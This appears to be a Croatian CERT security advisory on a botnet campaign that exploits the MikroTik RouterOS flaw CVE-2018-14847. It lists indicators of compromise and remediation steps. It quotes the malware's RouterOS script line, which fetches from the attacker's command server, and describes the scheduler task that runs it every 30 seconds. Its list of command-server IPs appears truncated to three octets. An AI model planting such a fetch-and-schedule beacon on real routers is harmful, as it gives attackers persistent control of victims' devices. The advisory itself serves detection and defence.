You are here
Home > Novosti > Botnet kampanja napada MikroTik usmjerivače

Botnet kampanja napada MikroTik usmjerivače

NOVE INFORMACIJE:

 

Još jedna komponenta zlonamjernog softvera na usmjerivaču su čini se tajna vrata (eng. backdoor) koja slušaju na priključku (eng. port) 4145.

Čak i nakon svih prethodno navedenih koraka sanacije, ova komponenta može i dalje dati pristup napadaču.

Zato:

 • još jedan indikator da je uređaj napadnut je otvoren priključak (eng. port) 4145,
 • za sanaciju je, u kratkom roku, korisno vatrozidom (eng. firewall) blokirati pristup na priključak 4145,
 • u dužem roku, preporučamo potpunu reinstalaciju OS-a na uređaj, ako je to moguće, kako bi se uklonile bilo koje preostale komponente zlonamjernog softvera.

Trenutno je aktivna botnet kampanja u kojoj se masovno napadaju MikroTik usmjerivači.

Napadi iskorištavaju ranjivost MikroTik RouterOS-a (CVE-2018-14847) za koju je zakrpa izdana 23. travnja 2018. godine. Iskorištavanje ranjivosti napadaču omogućava udaljeno čitanje korisničkih imena i lozinki administratorskih računa na usmjerivaču. Napadi u sklopu ove botnet kampanje između ostaloga se koriste i za širenje zlonamjernog softvera za rudarenje kriptovaluta.

 

Botnet kampanja aktivna je i u Hrvatskoj. Primijećeni su napadi na uređaje u Hrvatskoj unutar zadnjih tjedan dana te postoje znakovi da se zaraženi uređaji koriste za slanje neželjene pošte.

 

Napadi mogu ostaviti tragove u dnevnicima (eng. logs) u obliku zapisa prijave legitimnih korisničkih računa s neobičnih IP adresa, primjerice:

 

account user <ime legitimnog korisničkog računa> logged in from 95.154.216.151 via winbox

 

Za sanaciju napada, preporučuje se:

 

 • postavljanje ograničenja na IP adrese koje smiju pristupiti administracijskim servisima usmjerivača,
 • blokiranje poznatih zlonamjernih IP adresa (popis je dostupan niže),
 • brisanje komponenata zlonamjernog softvera s usmjerivača na temelju trenutno poznatih informacija (dodatne informacije dostupne su niže),
 • ažuriranje usmjerivača na novu, sigurniju inačicu,
 • izmjena lozinki svih korisnika za administraciju usmjerivača.

 

Trenutno su poznate sljedeće IP adrese kontrolnih poslužitelja napadača (eng. C&C servers):

 

 • 154.216.151
 • 154.216.160
 • 154.216.163
 • 154.216.165
 • 154.216.167

 

Zlonamjerni softver na usmjerivaču može sadržavati sljedeće komponente:

 

 • skriptu nazvanu „script3_“ sa sadržajem sljedećeg oblika:

/tool fetch address=95.154.216.167 port=2008 src-path=/mikrotik.php mode=http keep-result=no

 

 

Slika 1 – zlonamjerna skripta u popisu skripta

 

 

 

Slika 2 – sadržaj zlonamjerne skripte

 • zadatak u rasporedu (eng. scheduler) naziva „schedule3_“ koji svakih 30 sekunda poziva navedenu skriptu

 

 

 

Slika 3 – zadatak u rasporedu koji pokreće zlonamjernu skriptu

Top
More in Novosti
PREGLED TJEDNIH NOVOSTI O ZLONAMJERNOM RANSOMWARE SADRŽAJU #16

21. srpnja 2018. godine   Žrtve ransomwarea njRat mogu dobiti besplatno dešifriranje datoteka Ako su Vam datoteke šifrirane ransomwareom njRat...

Close